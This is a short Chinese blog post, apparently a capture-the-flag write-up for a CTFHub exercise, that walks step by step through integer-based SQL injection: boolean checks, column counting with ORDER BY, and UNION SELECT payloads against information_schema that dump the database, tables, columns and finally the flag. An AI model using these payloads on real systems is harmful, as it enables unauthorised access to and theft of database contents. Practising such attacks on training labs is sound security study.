sql整数型注入

Posted s0Il

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql整数型注入相关的知识,希望对你有一定的参考价值。

1.检查是否存在注入

and 1=1 返回正确
and 1=2 返回错误

2.猜出字段数

order by x(数字)
得出字段数

3.然后就是爆数据库名,information_schema三步

?id=1 and 1=2 union select 1,database()

得到数据库名称sqli

4.爆表名

?id=1 and 1=2 union select 1,group_concat(table_name)from information_schema.tables where table_schema=‘sqli‘

得到表名 news,flag

5.爆字段名

?id=1 and 1=2 union select 1,group_concat(column_name) frominformation_schema.columns where table_name=‘flag‘

得到字段名flag

6.爆flag

                                                                        字段名          数据库.表名
?id=1 and 1=2 union select 1,group_concat(flag) from sqli.flag

得到flag{hdjaldanklfk2r3rb23ry34gf82huh2u9f}


以上是关于sql整数型注入的主要内容,如果未能解决你的问题,请参考以下文章

CTFHub(整数型注入)

PHP怎么防止sql注入

CTFHub_SQL整数型注入(超详解)

CTFHub_SQL整数型注入(超详解)

CTFHub_SQL整数型注入(超详解)

CTFHub_SQL整数型注入(超详解)